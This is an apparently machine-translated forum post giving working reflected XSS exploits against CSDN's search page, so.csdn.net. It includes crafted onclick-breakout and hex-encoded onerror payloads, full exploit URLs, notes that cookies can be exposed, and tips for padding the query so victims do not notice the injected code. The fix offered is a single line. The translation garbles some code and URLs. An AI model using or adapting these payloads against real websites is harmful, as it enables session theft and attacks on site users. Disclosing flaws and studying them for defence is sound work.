Xss vulnerability and exploitation skills in csdn Forum

Csdn has a reflected xss somewhere .. I just sent one. This is another case. I wrote both of them here, but I didn't write them in detail. So if you see it in management, delete it.

What is the search http://so.csdn.net/search of csdn on the vulnerability page? There are two different xss vulnerabilities
 
The search link is
 
Http://so.csdn.net/search? Utf8 = % E2 % 9C % 93 & t = & q = xxx & commit = % E6 % 90% 9C + % E7 % B4 % A2 & sort =
 
Here xxx is the input content. View the source file to search for this string. Here, the string is "aaa"
 
1. First place. Www.2cto.com
Almost every link on this page has an onclick action, which occurs in the title of the search result. View code
<A href = "http://blog.csdn.net/walterhj/article/details/6070450" onclick = "click_log ('blog ', 'aaa', '123 ') "target =" _ blank "> Simware combined with the <span class =" keyword "> AAA </span> experiment of Cisco ACS </a>
Then you can test
Onclick = "click_log ('blog ', 'aaa', '000000')" with single quotes and parentheses closed, then write our own actions, in this way, the user clicks the search result.
Construction Parameters
Aaaa '); alert (/xss/) // then get the link
 
Http://so.csdn.net/search? Utf8 = % E2 % 9C % 93 & t = & q = aaaaaa ') % 3 balert (% 2 fxss % 2f) // & commit = % E6 % 90% 9C + % E7 % B4 % A2 & sort =. Click any search result on this page to bring up a box.
 
 
 
 
 
The cookie can also pop up normally after being tried. After onclick is executed, the system automatically jumps to the desired result. Of course, we can extend the search request string, and squeeze the special characters in the search box to the backend so that users can not see it.
 
 
 
 
 
 
I don't think much about it, for example
"To improve the assembly language level, in addition to Wang Shuang, Which books can be read? '); alert (/xss/) //" long strings + code to prevent user discovery. Converting this string into a url code and inserting it after the q Parameter can achieve good results.
2. Second place.
 
When searching for "aaa", I also found a statement at the bottom of the source file:
 
<Script> document. write ("
The purpose of this Code is to write an image link. So can we construct a link to close the image and write an onerror action? This page does not filter the backslash, so we can use hexadecimal encoding to bypass it.
 
"Onerror =" alert (/xss/) "> encoding: \ x22 \ x6f \ x6e \ x65 \ x72 \ x72 \ x6f \ x72 \ x3d \ x22 \ x61 \ x6c \ x65 \ x72 \ x74 \ x28 \ x2f \ x78 \ x73 \ x73 \ x2f \ x29 \ x22 \ x3e
The complete link is as follows:
Http://so.csdn.net/search? Utf8 = % E2 % 9C % 93 & t = & q = \ x22 \ x6f \ x6e \ x65 \ x72 \ x72 \ x6f \ x72 \ x3d \ x22 \ x61 \ x6c \ x65 \ x72 \ x74 \ x28 \ x2f \ x78 \ x73 \ x73 \ x2f \ x29 \ x22 \ x3e & commit = % E6 % 90% 9C + % E7 % B4 % A2 & sort = this can be compared with the one above, however, loading on my computer is very slow.
 
 





Solution:

Enhanced Filtering